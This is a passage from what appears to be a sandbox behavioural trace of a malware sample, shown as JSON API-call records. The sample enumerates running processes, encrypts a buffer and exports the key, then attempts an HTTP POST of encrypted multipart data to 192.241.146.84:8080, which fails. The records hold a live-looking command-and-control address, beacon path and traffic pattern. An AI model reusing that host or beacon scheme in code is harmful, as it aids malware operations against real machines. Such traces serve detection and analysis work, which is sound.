"0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "9512" + } + ], + "repeated": 0, + "id": 1889 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WmiPrvSE.exe" + }, + { + "name": "ProcessId", + "value": "9600" + } + ], + "repeated": 0, + "id": 1890 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "9720" + } + ], + "repeated": 0, + "id": 1891 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "OneDrive.exe" + }, + { + "name": "ProcessId", + "value": "9972" + } + ], + "repeated": 0, + "id": 1892 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SkypeBackgroundHost.exe" + }, + { + "name": "ProcessId", + "value": "7352" + } + ], + "repeated": 0, + "id": 1893 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "8568" + } + ], + "repeated": 0, + "id": 1894 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "7144" + } + ], + "repeated": 0, + "id": 1895 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "5208" + } + ], + "repeated": 0, + "id": 1896 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "9936" + } + ], + "repeated": 0, + "id": 1897 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "VSSVC.exe" + }, + { + "name": "ProcessId", + "value": "9848" + } + ], + "repeated": 0, + "id": 1898 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "9892" + } + ], + "repeated": 0, + "id": 1899 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "10120" + } + ], + "repeated": 0, + "id": 1900 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchFilterHost.exe" + }, + { + "name": "ProcessId", + "value": "9956" + } + ], + "repeated": 0, + "id": 1901 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "816" + } + ], + "repeated": 0, + "id": 1902 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": false, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1903 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce3707", + "parentcaller": "0x03ce461b", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004dc" + } + ], + "repeated": 0, + "id": 1904 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce1bde", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptEncrypt", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptKey", + "value": "0x04e240c0" + }, + { + "name": "CryptHash", + "value": "0x04e24c80" + }, + { + "name": "Buffer", + "value": "\\xa6\\xb5\\xcaCp\\xe2lO\\x10r\\xd9\\x81g\\xd3\\xd1\\xbe\\x8f\\xcc\\x82=\\xc7\\x03:\\xb0t+\\x19\\xe1\\xab\\xa5\\xb6\\xe4X\\x8f\\x86H\\x04\\xe1\\xc6\\x83\\xc2\\x05\\xb8Ln\\xdd\\x10\\xc5\\xf7\\xeaz\\xb4\\x17\\xb0O\\x98Zx@?\\xfc\\x92C\\x1d\\x1fs=\\xbd\\x19\\x05\\x81\\x8f<5\\xd1?9\\x1c\\xcaI\\x9a\\xd1\\xb8#\\x92\\xc2\\xef\\xcd^\\x83\\xa1(\\x88\\\\x02-\\xc4?v\\xa2\\xc1Oq\\xb0\\xd4R\\x078\\xc01\\x94\\x06\\xbb\\xbej\\xf6\\xef\\xf8\\xf4\\x8b\\x01\\xd4\\x104\\xb1\\x97R\r\\x1fq\\x1b_9E\\x82\\x01\\xc7E\\xdc6\\x90\\xf2\\x93\\xd3\\xd4{L\\xa8\\x0e!\\xde\\x05u+\\xce\\xfe2\r\\xcf\\x11\\xc4\\x0cFq\\x145m\\x84\\x83\\xbdUy\\x01\\xf7$N\\x13\\xc8>\\x19S\\xaf`,Z\\xd7\\x06Z\\x85-=\\xcaX*\\xba\\x1cG\\x18\\xac)|a\\x82\\x1a\\x9d\\\\xe6nD\\xf0\\x8a-\\x89\\xe6%e\\xcc\\xe2\\xd5&\\x8f_\\xc6A\\x83R\\xfc\\xc5<\\xfe\\xfc\\x08!\\x05\\xe9\\x0c\\x9a[\\x18\\x86;\\x91.\\xca\\xc4\\x8d\\xe8\\\\xc5\\xaf\\xad\\xd8b\\x8c\\xba\\xe3" + }, + { + "name": "Length", + "value": "672" + }, + { + "name": "Final", + "value": "1" + } + ], + "repeated": 0, + "id": 1905 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce1b83", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptExportKey", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptKey", + "value": "0x04e240c0" + }, + { + "name": "Buffer", + "value": "\\x01\\x02\\x00\\x00\\x0ef\\x00\\x00\\x00\\xa4\\x00\\x00\\xb7\\xad\\xbd\\x94\\xc8r\\x88O\\xac\\xeaC\\x14\\xa6\\x8df\\xfb\\x04\\x98;!\\x1bJvEY\\x18\\xc3\\xf5\\xdc_\\x89\\xc5\\x19\\xa6c\\xc0\\xc2\\xeb7\\x03\\xe3\\xb43s\\xa1\\xf2\\x9b\\x06\\x1d\\xbc=\\x16\\xa8\\xbb\\xbbA\\xf1a\\xf1\\x19W\\x95\\x19\t\\xe7\\xfd\\xf9Tm\\x94yX'\\x06\\x16\\xba\\x05z\\xd3\\xea\\xbf\\xeeyD(\\xed6\\x04\\x94\\x13t\\xfc\\x8f\\x02\\x90\\x97" + }, + { + "name": "BlobType", + "value": "1", + "pretty_value": "SIMPLEBLOB" + }, + { + "name": "Flags", + "value": "0x00000040" + }, + { + "name": "Length", + "value": "108" + } + ], + "repeated": 0, + "id": 1906 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce1c0a", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptDestroyHash", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptHash", + "value": "0x04e24c80" + } + ], + "repeated": 0, + "id": 1907 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce235f", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "ObtainUserAgentString", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "UserAgent", + "value": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)" + } + ], + "repeated": 0, + "id": 1908 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 4, + "id": 1909 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetOpenW", + "status": true, + "return": "0x00cc0004", + "arguments": [ + { + "name": "Agent", + "value": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)" + }, + { + "name": "AccessType", + "value": "0x00000000" + }, + { + "name": "ProxyName", + "value": "" + }, + { + "name": "ProxyBypass", + "value": "" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 1910 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce21eb", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetConnectW", + "status": true, + "return": "0x00cc0008", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0004" + }, + { + "name": "ServerName", + "value": "192.241.146.84" + }, + { + "name": "ServerPort", + "value": "8080" + }, + { + "name": "Username", + "value": "" + }, + { + "name": "Password", + "value": "" + }, + { + "name": "Service", + "value": "3" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 1911 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce219e", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "HttpOpenRequestW", + "status": true, + "return": "0x00cc000c", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0008" + }, + { + "name": "Path", + "value": "KmdXW7KWDQ9NsVk5Qau/UkFPziJTzAl/" + }, + { + "name": "Flags", + "value": "0x844cc300" + }, + { + "name": "Referrer", + "value": "" + }, + { + "name": "Verb", + "value": "POST" + } + ], + "repeated": 0, + "id": 1912 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "9440", + "caller": "0x03ce22b8", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 7, + "id": 1913 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "6332", + "caller": "0x73331eb3", + "parentcaller": "0x73331c87", + "category": "network", + "api": "WinHttpSetOption", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00713f18" + }, + { + "name": "Option", + "value": "0x0000002d" + }, + { + "name": "Buffer", + "value": "h\\xa4)\\x05" + } + ], + "repeated": 0, + "id": 1914 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "6332", + "caller": "0x7334c060", + "parentcaller": "0x7334b989", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 2, + "id": 1915 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "6332", + "caller": "0x756b8c89", + "parentcaller": "0x739ecb7a", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000408" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 1916 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "6332", + "caller": "0x770225b6", + "parentcaller": "0x77021fc0", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004cc" + } + ], + "repeated": 0, + "id": 1917 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "6332", + "caller": "0x770225b6", + "parentcaller": "0x77021fc0", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d4" + } + ], + "repeated": 0, + "id": 1918 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "6332", + "caller": "0x7335d6d6", + "parentcaller": "0x7338784c", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1919 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x73a35097", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 1920 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x739f2629", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000046c" + } + ], + "repeated": 0, + "id": 1921 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x73a350ec", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000408" + } + ], + "repeated": 0, + "id": 1922 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "6332", + "caller": "0x770225b6", + "parentcaller": "0x770269b6", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d0" + } + ], + "repeated": 0, + "id": 1923 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "8196", + "caller": "0x7332ed40", + "parentcaller": "0x7332e70d", + "category": "network", + "api": "GetAddrInfoExW", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Name", + "value": "192.241.146.84" + }, + { + "name": "ServiceName", + "value": "" + } + ], + "repeated": 0, + "id": 1924 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "8196", + "caller": "0x7337e0ec", + "parentcaller": "0x7337e077", + "category": "network", + "api": "WSASocketW", + "status": true, + "return": "0x000004f0", + "arguments": [ + { + "name": "af", + "value": "2", + "pretty_value": "AF_INET" + }, + { + "name": "type", + "value": "1", + "pretty_value": "SOCK_STREAM" + }, + { + "name": "protocol", + "value": "6", + "pretty_value": "IPPROTO_TCP" + }, + { + "name": "socket", + "value": "1264" + } + ], + "repeated": 0, + "id": 1925 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "8196", + "caller": "0x76112466", + "parentcaller": "0x7337e84b", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "41", + "pretty_value": "FileIoStatusBlockRangeInformation" + }, + { + "name": "FileInformation", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1926 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "8196", + "caller": "0x7705727f", + "parentcaller": "0x77057096", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "30", + "pretty_value": "FileCompletionInformation" + }, + { + "name": "FileInformation", + "value": "T\\x00\\x00\\x00\\x10\\x84*\\x05" + } + ], + "repeated": 0, + "id": 1927 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "8196", + "caller": "0x7337e17b", + "parentcaller": "0x7337e077", + "category": "network", + "api": "bind", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1264" + }, + { + "name": "ip", + "value": "0.0.0.0" + }, + { + "name": "port", + "value": "0" + } + ], + "repeated": 0, + "id": 1928 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "8196", + "caller": "0x6db9ac5d", + "parentcaller": "0x7554234d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "IoControlCode", + "value": "0x0001202f", + "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" + }, + { + "name": "InputBuffer", + "value": "" + }, + { + "name": "OutputBuffer", + "value": "\\x02\\x00\\xc4\\x1b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1929 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "8196", + "caller": "0x7337e1b7", + "parentcaller": "0x7337e077", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1264" + }, + { + "name": "level", + "value": "0x00000006" + }, + { + "name": "optname", + "value": "0x00000001" + }, + { + "name": "optval", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1930 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "8196", + "caller": "0x6db8a714", + "parentcaller": "0x7553f4f1", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "IoControlCode", + "value": "0x000120bf", + "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" + }, + { + "name": "InputBuffer", + "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xe3\\xf3k\\x05\\x01\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 1931 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "8196", + "caller": "0x6db8a714", + "parentcaller": "0x7553f4f1", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "IoControlCode", + "value": "0x000120bf", + "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" + }, + { + "name": "InputBuffer", + "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00\\x88\\xf3k\\x05\\x08\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 1932 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "8196", + "caller": "0x7337e233", + "parentcaller": "0x7337e077", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1264" + }, + { + "name": "level", + "value": "0x0000ffff" + }, + { + "name": "optname", + "value": "0x00001002" + }, + { + "name": "optval", + "value": "\\x00\\x00\\x04\\x00" + } + ], + "repeated": 0, + "id": 1933 + }, + { + "timestamp": "2025-03-07 22:34:39,750", + "thread_id": "8196", + "caller": "0x7337dc91", + "parentcaller": "0x7337db66", + "category": "network", + "api": "ConnectEx", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1264" + }, + { + "name": "SendBuffer", + "value": "" + }, + { + "name": "ip", + "value": "192.241.146.84" + }, + { + "name": "port", + "value": "8080" + } + ], + "repeated": 0, + "id": 1934 + }, + { + "timestamp": "2025-03-07 22:35:00,782", + "thread_id": "8196", + "caller": "0x7335afe3", + "parentcaller": "0x756dd613", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 3, + "id": 1935 + }, + { + "timestamp": "2025-03-07 22:35:00,782", + "thread_id": "8196", + "caller": "0x73389bd2", + "parentcaller": "0x7332eeb2", + "category": "network", + "api": "closesocket", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1264" + } + ], + "repeated": 0, + "id": 1936 + }, + { + "timestamp": "2025-03-07 22:35:00,782", + "thread_id": "8196", + "caller": "0x733cc064", + "parentcaller": "0x7337a91d", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 3, + "id": 1937 + }, + { + "timestamp": "2025-03-07 22:35:00,782", + "thread_id": "9440", + "caller": "0x03ce22b8", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "HttpSendRequestW", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "RequestHandle", + "value": "0x00cc000c" + }, + { + "name": "Headers", + "value": "Referer: http://192.241.146.84/KmdXW7KWDQ9NsVk5Qau/UkFPziJTzAl/\r\nContent-Type: multipart/form-data; boundary=---------------------------117772014939232\r\n" + }, + { + "name": "PostData", + "value": "\r\n-----------------------------117772014939232\r\nContent-Disposition: form-data; name=\"gTVTplUoGXaaTQZzB\"; filename=\"qFDloRrZgI\"\r\nContent-Type: application/octet-stream\r\n\r\n\\x97\\x90\\x02\\x8f\\xfct\\x13\\x94\\x046\\xed(Dy\\xee\\xbf\\xea\\xd3z\\x05\\xba\\x16\\x06'Xy\\x94mT\\xf9\\xfd\\xe7\t\\x19\\x95W\\x19\\xf1a\\xf1A\\xbb\\xbb\\xa8\\x16=\\xbc\\x1d\\x06\\x9b\\xf2\\xa1s3\\xb4\\xe3\\x037\\xeb\\xc2\\xc0c\\xa6\\x19\\xc5\\x89_\\xdc\\xf5\\xc3\\x18YEvJ\\x1b!;\\x98\\x04\\xfbf\\x8d\\xa6\\x14" + } + ], + "repeated": 0, + "id": 1938 + }, + { + "timestamp": "2025-03-07 22:35:00,782", + "thread_id": "9440", + "caller": "0x03ce221c", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 5, + "id": 1939 + }, + { + "timestamp": "2025-03-07 22:35:00,782", + "thread_id": "9440", + "caller": "0x03ce221c", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetCloseHandle", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc000c" + } + ], + "repeated": 0, + "id": 1940 + }, + { + "timestamp": "2025-03-07 22:35:00,782", + "thread_id": "9440", + "caller": "0x03ce227a", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetCloseHandle", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0008" + } + ], + "repeated": 0, + "id": 1941 + }, + { + "timestamp": "2025-03-07 22:35:00,782", + "thread_id": "9440", + "caller": "0x03ce23c3", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetCloseHandle", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0004" + } + ], + "repeated": 0, + "id": 1942 + }, + { + "timestamp": "2025-03-07 22:35:00,782", + "thread_id": "8196", + "caller": "0x7334bcc4", + "parentcaller": "0x7337a91d", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 2, + "id": 1943 + }, + { + "timestamp": "2025-03-07 22:35:00,782", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "183" + } + ], + "repeated": 0, + "id": 1944 + }, + { + "timestamp": "2025-03-07 22:35:00,969", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1945 + }, + { + "timestamp": "2025-03-07 22:35:00,969", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "210" + } + ], + "repeated": 0, + "id": 1946 + }, + { + "timestamp": "2025-03-07 22:35:01,188", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1947 + }, + { + "timestamp": "2025-03-07 22:35:01,188", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "269" + } + ], + "repeated": 0, + "id": 1948 + }, + { + "timestamp": "2025-03-07 22:35:01,469", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1949 + }, + { + "timestamp": "2025-03-07 22:35:01,469", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "230" + } + ], + "repeated": 0, + "id": 1950 + }, + { + "timestamp": "2025-03-07 22:35:01,704", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1951 + }, + { + "timestamp": "2025-03-07 22:35:01,704", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "305" + } + ], + "repeated": 0, + "id": 1952 + }, + { + "timestamp": "2025-03-07 22:35:02,016", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1953 + }, + { + "timestamp": "2025-03-07 22:35:02,016", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "297" + } + ], + "repeated": 0, + "id": 1954 + }, + { + "timestamp": "2025-03-07 22:35:02,329", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1955 + }, + { + "timestamp": "2025-03-07 22:35:02,329", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "290" + } + ], + "repeated": 0, + "id": 1956 + }, + { + "timestamp": "2025-03-07 22:35:02,625", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": 